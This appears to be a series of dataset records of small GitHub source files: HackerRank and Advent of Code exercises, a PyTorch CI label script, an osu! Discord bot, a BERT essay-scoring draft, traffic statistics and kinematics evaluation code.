len(absolute_ids) == 0\n","repo_name":"vriesdemichael/microservices","sub_path":"tests/test_schema_parsing.py","file_name":"test_schema_parsing.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21974824323","text":"#def gp(a,q):\r\n\t#k = 0\r\n\t#while True:\r\n\t\t#result = a * q**k\r\n\t\t#if result <=10000:\r\n\t\t\t#yield result\r\n\t\t#else:\r\n\t\t\t#return\r\n\t\t#print(k)\r\n\t\t#k += 1\r\n\t\t\r\n\t\t\r\n#a, q = input().strip().split(' ')\r\n#[a, q] = map(int, [a,q])\r\n#gps = gp(a,q)\r\n##print(list(gp(a,q))\t\t)\r\n##print(gp(a,q))\r\n#print(gps.__next__())\r\n#print(gps.__next__())\r\n#print(gps.__next__())\r\n\r\n\r\ndef counter(start=0):\r\n\tn = start\r\n\twhile True:\r\n\t\tresult = yield n # A\r\n\t\tprint(type(result), result) # B\r\n\t\tif result == 'Q':\r\n\t\t\tbreak\r\n\t\tn += 1\r\nc = counter()\r\nprint(next(c)) # C\r\nprint(c.send('Wow!')) # D\r\nprint(next(c)) # E\r\nprint(c.send('Q')) # F\r\n","repo_name":"pyaf/hackerrank","sub_path":"algorithm/challenges/newtest.py","file_name":"newtest.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9060941418","text":"\r\n\r\ndef main():\r\n\r\n output = 
open('RUN_LCD-Composer_Human_SRsearch_and_SKsearch_Batch.bat', 'w')\r\n \r\n for s_comp in range(20, 105, 5):\r\n for r_comp in range(20, 105, 5):\r\n if s_comp + r_comp > 100:\r\n continue\r\n \r\n # WRITE COMMANDS FOR S+R SEARCH\r\n output.write('python LCD-Composer.py UP000005640_9606.fasta Human_S-R_' + str(s_comp) + '-' + str(r_comp) + '_RESULTS -a S_R -c ' + str(s_comp) + '_' + str(r_comp) + '\\n')\r\n output.write('python LCD-Composer.py UP000005640_9606_additional.fasta Human_S-R_' + str(s_comp) + '-' + str(r_comp) + '_RESULTS_Additional_Isoforms -a S_R -c ' + str(s_comp) + '_' + str(r_comp) + '\\n')\r\n \r\n # WRITE COMMANDS FOR S+K SEARCH, USING r_comp VALUE BUT SUBSTITUTING K IN PLACE OF R IN THE SEARCH\r\n output.write('python LCD-Composer.py UP000005640_9606.fasta Human_S-K_' + str(s_comp) + '-' + str(r_comp) + '_RESULTS -a S_K -c ' + str(s_comp) + '_' + str(r_comp) + '\\n')\r\n \r\n output.close()\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"RossLabCSU/RNA2022","sub_path":"Reproducibility/Human_RSdomains/make_Human_SRsearch_and_SKsearch_BatchFile.py","file_name":"make_Human_SRsearch_and_SKsearch_BatchFile.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"759488346","text":"from base import BaseDay\n\n\nclass Day(BaseDay):\n day = 5\n\n def load_initial(self):\n lines = self.data_lines[:8]\n lines.reverse()\n STACK_COUNT = 9\n stacks = [list() for _ in range(STACK_COUNT)]\n\n for line in lines:\n for n in range(STACK_COUNT):\n letter = line[(n * 4) + 1]\n if letter != ' ':\n stacks[n].append(letter)\n\n self.stacks = stacks\n\n def part_1(self):\n self.load_initial()\n \n instructions = self.data_lines[10:]\n for line in instructions:\n if line == '':\n continue\n\n _, a, _, b, _, c = line.split(' ')\n n, start, end = int(a), int(b), int(c)\n\n for _ in range(n):\n self.stacks[end - 1].append(self.stacks[start - 1].pop())\n\n ends = [stk.pop() for stk in self.stacks]\n print(''.join(ends))\n\n def part_2(self):\n self.load_initial()\n \n instructions = self.data_lines[10:]\n for line in instructions:\n if line == '':\n continue\n\n _, a, _, b, _, c = line.split(' ')\n n, start, end = int(a), int(b), int(c)\n\n to_remove = self.stacks[start - 1][-n:]\n del self.stacks[start - 1][-n:]\n\n self.stacks[end-1].extend(to_remove)\n\n ends = [stk.pop() for stk in self.stacks]\n print(''.join(ends))\n\nDay().execute()\n","repo_name":"gavinhodge/adventofcode-2022","sub_path":"day05.py","file_name":"day05.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14801748519","text":"#!/usr/bin/env python3\nimport sys\nfrom pathlib import Path\nfrom typing import Any, cast, Dict, List, Set\n\nimport yaml\n\nGITHUB_DIR = Path(__file__).parent.parent\n\n\ndef get_workflows_push_tags() -> Set[str]:\n \"Extract all known push tags from workflows\"\n rc: Set[str] = set()\n for fname in (GITHUB_DIR / \"workflows\").glob(\"*.yml\"):\n with fname.open(\"r\") as f:\n wf_yml = yaml.safe_load(f)\n # \"on\" is alias to True in yaml\n on_tag = wf_yml.get(True, None)\n push_tag = on_tag.get(\"push\", None) if isinstance(on_tag, dict) else None\n tags_tag = push_tag.get(\"tags\", None) if isinstance(push_tag, dict) else None\n if isinstance(tags_tag, list):\n rc.update(tags_tag)\n return rc\n\n\ndef filter_ciflow_tags(tags: Set[str]) -> List[str]:\n \"Return sorted list of ciflow tags\"\n 
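# workflow tags look like \"ciflow/trunk/*\"; drop the trailing \"/*\" to keep just the label\n    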
return sorted(\n        tag[:-2] for tag in tags if tag.startswith(\"ciflow/\") and tag.endswith(\"/*\")\n    )\n\n\ndef read_probot_config() -> Dict[str, Any]:\n    with (GITHUB_DIR / \"pytorch-probot.yml\").open(\"r\") as f:\n        return cast(Dict[str, Any], yaml.safe_load(f))\n\n\ndef update_probot_config(labels: Set[str]) -> None:\n    orig = read_probot_config()\n    orig[\"ciflow_push_tags\"] = filter_ciflow_tags(labels)\n    with (GITHUB_DIR / \"pytorch-probot.yml\").open(\"w\") as f:\n        yaml.dump(orig, f, indent=4, sort_keys=False)\n\n\nif __name__ == \"__main__\":\n    from argparse import ArgumentParser\n\n    parser = ArgumentParser(\"Validate or update list of tags\")\n    parser.add_argument(\"--validate-tags\", action=\"store_true\")\n    args = parser.parse_args()\n    pushtags = get_workflows_push_tags()\n    if args.validate_tags:\n        config = read_probot_config()\n        ciflow_tags = set(filter_ciflow_tags(pushtags))\n        config_tags = set(config[\"ciflow_push_tags\"])\n        if config_tags != ciflow_tags:\n            print(\"Tags mismatch!\")\n            if ciflow_tags.difference(config_tags):\n                print(\n                    \"Reference in workflows but not in config\",\n                    ciflow_tags.difference(config_tags),\n                )\n            if config_tags.difference(ciflow_tags):\n                print(\n                    \"Reference in config, but not in workflows\",\n                    config_tags.difference(ciflow_tags),\n                )\n            print(f\"Please run {__file__} to remediate the difference\")\n            sys.exit(-1)\n        print(\"All tags are listed in pytorch-probot.yml\")\n    else:\n        update_probot_config(pushtags)\n","repo_name":"pytorch/pytorch","sub_path":".github/scripts/collect_ciflow_labels.py","file_name":"collect_ciflow_labels.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"45107210420","text":"# encoding: utf-8\n\nimport requests\nimport json\nimport random\n\nurl_update = \"http://192.168.138.191:9080/ime-container/imePlanOrder/insertPlanOrder.action\"\n\nheaders = {'Content-Type': 'application/json'}\n\n\ndef testCreate():\n    data = {\n        \"code\": 'API' + str(random.randint(10000, 99999)), # code -- required\n        \"workCenterGid\": \"0aad8f6efdbb404c94296965918d1a9d\", # work center -- required\n        \"orderType\": \"ss\", # order type\n        \"materialGid\": \"2e178a4731304d8f9b959e685fed0228\", # material GID -- required\n        \"materialVersion\": \"1\", # material version (redundant) -- required\n        \"planBeginTime\": \"2018-01-04\", # planned start time -- required\n        \"planEndTime\": \"2018-01-14\", # planned end time -- required\n        \"planQty\": \"50\", # production order quantity -- required\n        \"finishQty\": \"\", # completed quantity\n        \"publishedQty\": \"\", # released quantity\n        \"qualifiedQty\": \"\", # qualified quantity\n        \"unqualifiedQty\": \"\", # unqualified quantity\n        \"wasteQty\": \"\", # scrap quantity\n        \"orderStatus\": \"\", # order status\n        \"planOrderSource\": \"\", # production order source\n        \"planOrderCategory\": \"normal\", # order category\n        \"orderSeq\": \"\", # order sequence\n        \"factoryLineGid\": \"\", # production line\n        \"actualBeginTime\": \"\", # actual start time\n        \"actualEndTime\": \"\", # actual end time\n        \"measureBeginTime\": \"\", # estimated start time\n        \"measureEndTime\": \"\", # estimated end time\n        \"bomStatus\": \"\", # BOM status\n        \"processStatus\": \"\", # order progress\n        \"canOperation\": \"\", # operable or not\n        \"surplusOrderFlag\": \"\" # surplus order or not\n    }\n\n    resp = requests.post(url=url_update,headers=headers,data=json.dumps(data)).text\n\n    print(resp)\n\n\n\ncount = 0\n\n# while(count<3):\n#     testCreate()\n#     count =count+1\n\n\nfor i in range(2):\n    testCreate()","repo_name":"liuzhengxing/Test","sub_path":"Python/APIProject/Basic/Order_Create.py","file_name":"Order_Create.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"33448683168","text":"import csv\nimport json\n\n\ncause_dict = dict()\nstat_dict = dict()\nroad_dict = dict()\nalchol_dict = {\n 2: 0,\n 3: 0.075,\n 4: 0.125,\n 5: 0.20,\n 6: 0.275\n}\nreason_dict = {\n 1: \"違規超車\"\n ,2: \"爭(搶)道行駛\"\n ,3: \"蛇行、方向不定\"\n ,4: \"逆向行駛\"\n ,5: \"未靠右行駛\"\n ,6: \"未依規定讓車\"\n ,7: \"變換車道或方向不當\"\n ,8: \"左轉彎未依規定\"\n ,9: \"右轉彎未依規定\"\n ,10: \"迴轉未依規定\"\n ,11: \"橫越道路不慎\"\n ,12: \"倒車未依規定\"\n ,13: \"超速失控\"\n ,14: \"未依規定減速\"\n ,15: \"搶越行人穿越道\"\n ,16: \"未保持行車安全距離\"\n ,17: \"未保持行車安全間隔\"\n ,18: \"停車操作時,未注意其他車(人)安全\"\n ,19: \"起步未注意其他車(人)安全\"\n ,20: \"吸食違禁物後駕駛失控\"\n ,21: \"酒醉(後)駕駛失控\"\n ,22: \"疲勞(患病)駕駛失控\"\n ,23: \"未注意車前狀態\"\n ,24: \"搶(闖)越平交道\"\n ,25: \"違反號誌管制或指揮\"\n ,26: \"違反特定標誌(線)禁制\"\n ,27: \"未依規定使用燈光\"\n ,28: \"暗處停車無燈光、標識\"\n ,29: \"夜間行駛無燈光設備\"\n ,30: \"裝載貨物不穩妥\"\n ,31: \"載貨超重而失控\"\n ,32: \"超載人員而失控\"\n ,33: \"貨物超長、寬、高而肇事\"\n ,34: \"裝卸貨物不當\"\n ,35: \"裝載未盡安全措施\"\n ,36: \"未待乘客安全上下開車\"\n ,37: \"其他裝載不當肇事\"\n ,38: \"違規停車或暫停不當而肇事\"\n ,39: \"拋錨未採安全措施\"\n ,40: \"開啟車門不當而肇事\"\n ,41: \"使用手持行動電話失控\"\n ,42: \"其他引起事故之違規或不當行為\"\n ,43: \"不明原因肇事\"\n ,44: \"尚未發現肇事因素\"\n ,45: \"煞車失靈\"\n ,46: \"方向操縱系統故障\"\n ,47: \"燈光系統故障\"\n ,48: \"車輪脫落或輪胎爆裂\"\n ,49: \"車輛零件脫落\"\n ,50: \"其他引起事故之故障\"\n ,51: \"未依規定行走行人穿越道、地下道、天橋而穿越道路\"\n ,52: \"未依標誌、標線、號誌或手勢指揮穿越道路\"\n ,53: \"穿越道路未注意左右來車\"\n ,54: \"在道路上嬉戲或奔走不定\"\n ,55: \"未待車輛停妥而上下車\"\n ,56: \"上下車輛未注意安全\"\n ,57: \"頭手伸出車外而肇事\"\n ,58: \"乘坐不當而跌落\"\n ,59: \"在路上工作未設適當標識\"\n ,60: \"其他引起事故之疏失或行為\"\n ,61: \"路況危險無安全(警告)設施\"\n ,62: \"交通管制設施失靈或損毀\"\n ,63: \"交通指揮不當\"\n ,64: \"平交道看守疏失或未放柵欄\"\n ,65: \"其他交通管制不當\"\n ,66: \"動物竄出\"\n ,67: \"尚未發現肇事因\"\n}\nwith open(\"traffic_accident_105.csv\", \"r\", encoding=\"utf8\") as f:\n reader = csv.DictReader(f)\n total_death = 0\n total_alchol = 0\n total_speed_limit = 0\n for row in reader:\n area = row[\"區\"]\n try:\n cause = reason_dict[int(row[\"主要肇因\"])]\n drink = int(row[\"飲酒情形\"])\n if area not in cause_dict:\n # print(area)\n cause_dict[area] = {}\n stat_dict[area] = {}\n road_dict[area] = {}\n if cause not in cause_dict[area]:\n cause_dict[area][cause] = {\"total_death\": 0, \"total_alchol\": 0,\n \"total_limit\": 0, \"cnt\": 0}\n stat_dict[area][cause] = {\"avg_death\": 0, \"avg_alchol\": 0,\n \"avg_limit\": 0}\n road_dict[area][cause] = 0\n if 2 <= drink <= 6:\n cause_dict[area][cause][\"total_death\"] += int(row[\"死\"]) + int(row[\"受傷\"])\n cause_dict[area][cause][\"total_alchol\"] += alchol_dict[drink]\n cause_dict[area][cause][\"total_limit\"] += int(row[\"速限\"])\n cause_dict[area][cause][\"cnt\"] += 1\n road_dict[area][cause] += 1\n except ValueError:\n continue\n \nfor area, cause in cause_dict.items():\n for reason in cause.keys():\n reason_len = cause_dict[area][reason][\"cnt\"]\n if reason_len == 0:\n continue\n stat_dict[area][reason][\"avg_death\"] = cause_dict[area][reason][\"total_death\"] / reason_len\n stat_dict[area][reason][\"avg_alchol\"] = cause_dict[area][reason][\"total_alchol\"] / reason_len\n stat_dict[area][reason][\"avg_limit\"] = cause_dict[area][reason][\"total_limit\"] / reason_len\n\n\nwith open(\"../stat.json\", \"w\", encoding=\"utf8\") as f:\n json.dump(stat_dict, f, ensure_ascii=False)\n\nwith open(\"../reason.json\", \"w\", encoding=\"utf8\") as f:\n json.dump(road_dict, f, ensure_ascii=False)\n","repo_name":"tcaopendata/hackathon","sub_path":"backend/stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17077171096","text":"import discord\nfrom discord.ext 
import commands\nimport json\nfrom tokengen import osuapi\nfrom user import get_user\nimport datetime\nimport time\n\nclass osu(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n\n @commands.slash_command(\n name=\"osuregister\",\n description=\"register your osu ID to the bot\"\n )\n async def osuregister(self, ctx, playerid:int):\n params = {\n 'key': 'id'\n }\n link = f\"users/{playerid}\"\n data = osuapi(params, link)\n \n if data.status_code != 200:\n await ctx.respond(\"player id is invalid.\")\n return\n\n with open(\"users.json\") as file:\n listObj = json.load(file)\n\n listObj[str(ctx.user.id)] = playerid\n\n with open(\"users.json\", 'w') as json_file:\n json.dump(listObj, json_file, indent=2)\n\n await ctx.respond(f\"your profile is set to {data.json()['username']}\")\n \n @commands.slash_command(\n name=\"topplay\",\n description=\"Get the pp value of your top play in osu\"\n )\n async def topplay(self, ctx):\n playerid = await get_user(ctx)\n params = {\n 'mode': 'osu',\n 'limit': 1\n }\n link = f\"users/{playerid}/scores/best\"\n data = osuapi(params, link).json()\n print(json.dumps(data, indent=2))\n embed = discord.Embed(\n description = f'{data[0][\"weight\"][\"pp\"]}pp\\nplay set at \\n[Map Link]({data[0][\"beatmap\"][\"url\"]})',\n )\n embed.set_author(name = f\"{data[0]['beatmapset']['title']} [{data[0]['beatmap']['version']}]\",\n url = data[0]['beatmap']['url'])\n await ctx.respond(embed=embed)\n\n @commands.slash_command(\n name=\"recent\",\n description=\"Get the pp value of your most recent play in osu\"\n )\n async def recent(self, ctx):\n playerid = await get_user(ctx)\n params = {\n 'mode': 'osu',\n 'limit': 1\n }\n link = f\"users/{playerid}/scores/recent\"\n data = osuapi(params, link).json()\n print(json.dumps(data, indent=2))\n embed = discord.Embed(\n description = f'{data[0][\"pp\"]}pp\\nplay set at ',\n )\n embed.set_author(name = f\"{data[0]['beatmapset']['title']} [{data[0]['beatmap']['version']}]\",\n url = data[0]['beatmap']['url'])\n await ctx.respond(embed=embed)\n\ndef setup(client):\n client.add_cog(osu(client))","repo_name":"DBosPriv/Discord-bot1.0","sub_path":"cogs/customs/osu.py","file_name":"osu.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16645501421","text":"def zipped():\n n, x = map(int, input().strip().split())\n exam = []\n exam += [map(float, input().strip().split()) for _ in range(x)]\n average_student = [sum(stud) / x for stud in zip(*exam)]\n print(\"\\n\".join(map(str, average_student)))\n\n\ndef func_input():\n x, k = map(int, input().strip().split())\n print(eval(input().replace(\"x\", str(x))) == k)\n\n\ndef evaluation():\n eval(input())\n\n\ndef athlete_sort():\n n, m = map(int, input().strip().split())\n arr = [list(map(int, input().strip().split())) for _ in range(n)]\n k = int(input().strip())\n # NEED TO DONE IT\n [print(\" \".join(map(str, row))) for row in sorted(arr, key=lambda r: r[k])]\n\n\ndef any_or_all():\n n, arr = int(input().strip()), list(map(int, input().strip().split()))\n print(\n any([str(el) == str(el)[::-1] for el in arr])\n if all([el >= 0 for el in arr])\n else False\n )\n\n\ndef ginortS():\n print(\n *(\n sorted(\n input(),\n key=lambda x: (\n x.isdigit(),\n x.isdigit() and int(x) % 2 == 0,\n x.isupper(),\n x.islower(),\n x,\n ),\n )\n ),\n sep=\"\"\n 
)\n\n\nginortS()\n","repo_name":"SakhnoAndrey/hackerrank_python","sub_path":"built_ins.py","file_name":"built_ins.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1825909441","text":"# coding=utf-8\nimport nltk\nimport torch.nn as nn\nfrom transformers import BertModel, BertTokenizer\n\nMODELS = [(BertModel, BertTokenizer, 'bert-base-uncased')]\n\n\nclass BCNN(nn.Module):\n    def __init__(self, args):\n        super().__init__()\n\n        self.max_sentence_length = args.max_sentence_length\n        if self.max_sentence_length > 510:\n            self.max_sentence_length = 510\n\n        self.pretrained_weights = args.model_name\n\n        self.tokenizer = BertTokenizer.from_pretrained(self.pretrained_weights)\n        self.cls_token_id = self.tokenizer.convert_tokens_to_ids([self.tokenizer.cls_token])[0]\n        self.sep_token_id = self.tokenizer.convert_tokens_to_ids([self.tokenizer.sep_token])[0]\n\n        self.bert = BertModel.from_pretrained(self.pretrained_weights).to(args.device)\n\n        # self.classifier = CNN(args)\n        self.gru = nn.GRU(input_size=args.bert_hidden_size, hidden_size=args.bert_hidden_size, bidirectional=True,\n                          batch_first=True, dropout=args.gru_dropout)\n\n        self.dropout = nn.Dropout(args.linear_dropout)\n\n        self.classifier = nn.Linear(in_features=args.bert_hidden_size * 2, out_features=args.label_num)\n        self.max_score = args.max_score\n        self.min_score = args.min_score\n\n        self.init_weights()\n\n    def forward(self, essay):\n        # essay is a batch of essays; call BERT repeatedly to build a representation of each full essay, then feed it to the classifier\n\n        batch_tokens, longest_sentence_length = self.encode(essay)\n        for _tokens in batch_tokens:\n            pad_seq_length = min(longest_sentence_length, self.max_sentence_length)\n            tokens = [self.cls_token_id] + _tokens[:pad_seq_length] + [self.sep_token_id]\n\n            sentence_length = len(tokens)\n            pad_seq_length += 2\n\n            token_type_ids = [0] * sentence_length\n            input_mask = [1] * sentence_length\n\n            padding = [0] * (pad_seq_length - sentence_length)\n            tokens += padding\n            token_type_ids += padding\n            input_mask += padding\n\n    def encode(self, data):\n        # encode sentence representations; for now, process one sentence at a time\n        sentence_list = [[self.process_text(d)] for d in data]\n\n        batch_tokens = []\n        longest_sentence_length = 0\n        for sentence in sentence_list:\n            tokenized_text = self.tokenizer.encode(sentence)\n            batch_tokens.append(tokenized_text)\n            longest_sentence_length = max(longest_sentence_length, len(tokenized_text))\n\n        return batch_tokens, longest_sentence_length\n\n    def process_text(self, essay):\n        \"\"\" Split the essay into sentences \"\"\"\n        sentences = nltk.sent_tokenize(essay)\n        return sentences\n","repo_name":"wangqi1996/AES-bert","sub_path":"src/model/bcnn.py","file_name":"bcnn.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72171110313","text":"#! 
/usr/bin/env python\n\nimport random\nimport playermodel,stat_utils\n\n#random.seed(1234)\n\n#players = ['Andy', 'Bob', 'Carl', 'Donna', 'Erin', 'Fran']\nactivePlayerNames = ['Andy', 'Bob', 'Carl', 'Donna', 'Erin', 'Fran']\nhiddenScores = { 'Andy':1.0, 'Bob':2.0, 'Carl':3.0, 'Donna': 4.0, 'Erin': 5.0, 'Fran':6.0}\n\ndef genRandomBouts(playersByName, activePlayerNames, nTrials):\n result = []\n for _ in range(nTrials):\n pair = random.sample(activePlayerNames,2) \n result.append( playermodel.Bout(playersByName[pair[0]], playersByName[pair[1]])) \n return result\n\n\nplayersByName = {}\nfor name,score in list(hiddenScores.items()):\n playersByName[name] = playermodel.LogitPlayer(name,score)\nbouts = genRandomBouts(playersByName, activePlayerNames,100)\nfor i,b in enumerate(bouts): print(\"%d: %s\"%(i,b))\nfor b in bouts: b.resolve()\nfor i,b in enumerate(bouts): \n print(\"%d: %s\"%(i,b))\n print(b.getWinner())\n print(b.getLoser())\nestDict = stat_utils.estimate(playersByName, activePlayerNames, bouts)\n#counts = {}\n#trials = genRandomOutcomes(playersByName, activePlayerNames,10000)\n##print trials\n#estDict = lordbayes.estimate(players,trials)\n#print estDict\n","repo_name":"jswelling/BayesTourney","sub_path":"src/tests/obsolete/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6183701275","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n@file: find_path.py\n@author: wiley\n@datetime: 2020/6/4 10:40 AM\n\n二叉树中和为某一值得路径\n输入一棵二叉树和一个整数,打印出二叉树中节点值的和为输入整数的所有路径。\n从根节点开始往下一值到叶节点所经过的节点形成一条路径\n\"\"\"\n\n\nclass TreeNode(object):\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n\ndef path_sum(root, expected_sum):\n \"\"\"\n @param root: TreeNode\n @param expected_sum: int\n @return: List[List[int]]\n \"\"\"\n result, path = [], []\n\n def recur(node, tar):\n if not node:\n return\n path.append(node.val)\n tar = tar - node.val\n if tar == 0 and not node.left and not node.right:\n result.append(path[:])\n recur(node.left, tar)\n recur(node.right, tar)\n path.pop()\n\n recur(root, expected_sum)\n return result\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"skybrim/practice_leetcode_python","sub_path":"offer/data_structure/tree/find_path.py","file_name":"find_path.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21789994518","text":"from setuptools import setup, find_packages\nfrom pathlib import Path\n\nVERSION = '0.0.2'\nDESCRIPTION = ('Simply python utility wrapping around apktool to extract apk'\n 'information')\nLONG_DESCRIPTION = Path('readme.md').read_text()\n\n# Setting up\nsetup(\n # the name must match the folder name 'verysimplemodule'\n name=\"apkparse\",\n version=VERSION,\n author=\"Haider Ali\",\n author_email=\"neo@xkern.net\",\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n long_description_content_type='text/markdown',\n packages=find_packages(),\n install_requires=[\n 'pyyaml',\n 'xmltodict'\n ],\n\n keywords=['django', 'djangorestframework', 'responses', 'xkern'],\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3 :: Only\"\n 
])\n","repo_name":"xKern/apkparse","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10169950502","text":"\"\"\"Private code for CUDA rules.\"\"\"\n\nload(\"//cuda:defs.bzl\", \"CudaTargetsInfo\", \"cuda_targets\")\nload(\"//cuda:toolchain.bzl\", \"CudaToolchainInfo\")\nload(\"@bazel_tools//tools/cpp:toolchain_utils.bzl\", \"find_cpp_toolchain\")\nload(\"@bazel_skylib//rules:common_settings.bzl\", \"BuildSettingInfo\")\nload(\"@local_cuda//:defs.bzl\", \"if_local_cuda\")\n\ndef _cuda_targets_flag_impl(ctx):\n for cuda_target in ctx.build_setting_value:\n if cuda_target not in cuda_targets:\n fail(\"%s is not a supported %s value.\" % (cuda_target, ctx.label))\n return CudaTargetsInfo(cuda_targets = ctx.build_setting_value)\n\ncuda_targets_flag = rule(\n implementation = _cuda_targets_flag_impl,\n build_setting = config.string_list(flag = True),\n provides = [CudaTargetsInfo],\n)\n\ndef _detect_cuda_toolchain_impl(ctx):\n cc_toolchain = find_cpp_toolchain(ctx)\n feature_configuration = cc_common.configure_features(\n ctx = ctx,\n cc_toolchain = cc_toolchain,\n requested_features = [\"cuda\"],\n )\n is_enabled = cc_common.is_enabled(\n feature_configuration = feature_configuration,\n feature_name = \"cuda\",\n )\n return [config_common.FeatureFlagInfo(value = str(is_enabled))]\n\n# Rule providing whether the current cc_toolchain supports feature 'cuda'.\ndetect_cuda_toolchain = rule(\n implementation = _detect_cuda_toolchain_impl,\n attrs = {\n \"_cc_toolchain\": attr.label(\n default = Label(\"@bazel_tools//tools/cpp:current_cc_toolchain\"),\n ),\n },\n toolchains = [\"@bazel_tools//tools/cpp:toolchain_type\"],\n fragments = [\"cpp\"],\n)\n\ndef _report_error_impl(ctx):\n ctx.actions.run_shell(\n outputs = [ctx.outputs.out],\n progress_message = \"\\n%s\\n\" % ctx.attr.message,\n command = \"false \\\"%s\\\"\" % ctx.attr.message,\n )\n\n# Rule which passes anlysis phase, but fails during execution with message.\nreport_error = rule(\n implementation = _report_error_impl,\n attrs = {\n \"message\": attr.string(),\n \"out\": attr.output(mandatory = True),\n },\n)\n\ndef _cuda_toolchain_info_impl(ctx):\n return [\n DefaultInfo(files = depset([ctx.file._nvcc] if ctx.file._nvcc else [])),\n CudaToolchainInfo(\n nvcc = ctx.file._nvcc,\n compiler = ctx.attr._compiler[BuildSettingInfo].value,\n cuda_targets = ctx.attr._cuda_targets[CudaTargetsInfo].cuda_targets,\n copts = ctx.attr._copts[BuildSettingInfo].value,\n ),\n ]\n\n# A rule that encapsulates the information to pass to cuda_toolchain_config.\n# Specifically, it combines //cuda:cuda_targets, @local_cuda//:cuda/bin/nvcc\n# and //cuda:compiler.\ncuda_toolchain_info = rule(\n implementation = _cuda_toolchain_info_impl,\n attrs = {\n \"_cuda_targets\": attr.label(\n default = Label(\"//cuda:cuda_targets\"),\n ),\n \"_nvcc\": attr.label(\n default = if_local_cuda(Label(\"@local_cuda//:cuda/bin/nvcc\"), None),\n allow_single_file = True,\n executable = True,\n cfg = \"host\",\n ),\n \"_compiler\": attr.label(default = Label(\"//cuda:compiler\")),\n \"_copts\": attr.label(default = Label(\"//cuda:copts\")),\n },\n provides = 
[CudaToolchainInfo],\n)\n","repo_name":"xjdlb/my-awesome-tensorlfow-tutorial","sub_path":"runtime-master/third_party/rules_cuda/private/build.bzl","file_name":"build.bzl","file_ext":"bzl","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"70219261674","text":"import numpy as np\nfrom planar_kinematic_functions import *\n\n#evaluates the solutions of the numerical solver TRAC-IK\n\nif __name__ == \"__main__\":\n\n    joints_num_val = np.load(\"./data/joints_num_val.npy\") #solutions by TRAC-IK from ubuntu machine\n    link_lengths = np.load(\"./data/link_lengths.npy\")\n    delta_theta = np.load(\"./data/delta_theta.npy\")\n    Y_val = np.load(\"./data/Y_val.npy\")\n    joint_limits = np.load(\"./data/joint_limits.npy\")\n    X_val = np.load(\"./data/X_val.npy\")\n    \n    #calculate success rate\n    n_fails = np.sum(np.isnan(joints_num_val[:,0]))\n    success_rate = 1 - (n_fails / joints_num_val.shape[0])\n    \n    #filter NaN values out before calculating the errors\n    notnan = np.invert(np.isnan(joints_num_val[:,0]))\n    joints_num_notnan = joints_num_val[notnan]\n    X_val_notnan = X_val[notnan]\n\n    cartesian_num_notnan = FK_2D(joints_num_notnan, link_lengths)\n    pos_error = mae_position(X_val_notnan[:,:2], cartesian_num_notnan[:,:2])\n    orient_error = mae_orientation_2D(X_val_notnan[:,2], cartesian_num_notnan[:,2])\n    mean_min_errors, median_min_errors = min_error_2D_3DOF(Y_val, delta_theta, link_lengths)\n    viol_rate = joint_limit_violation_rate(joints_num_notnan, joint_limits)\n    print(\"\\nTRAC-IK success rate: \"+str(success_rate)+\n          \"\\nTRAC-IK mean absolute position error of successes: \"+str(pos_error)+\n          \"\\nTRAC-IK mean absolute orientation error of successes: \"+str(orient_error)+\n          \"\\nJoint limit violation rate: \"+str(viol_rate))","repo_name":"tvoeh/distal-teaching-ik","sub_path":"2D/numeric_eval.py","file_name":"numeric_eval.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"5118544755","text":"# Problem setup: record everything that is typed so it can be used elsewhere later\r\nimport os\r\nimport time\r\n\r\nwhile True:\r\n    strInput = input(\"请输入内容:\")\r\n    print(strInput)\r\n    if strInput.upper() == \"Q\":\r\n        print(\"输入结束\")\r\n        break\r\n\r\n# How do we get the recorded input back out???\r\nprint(\"????\")\r\n# 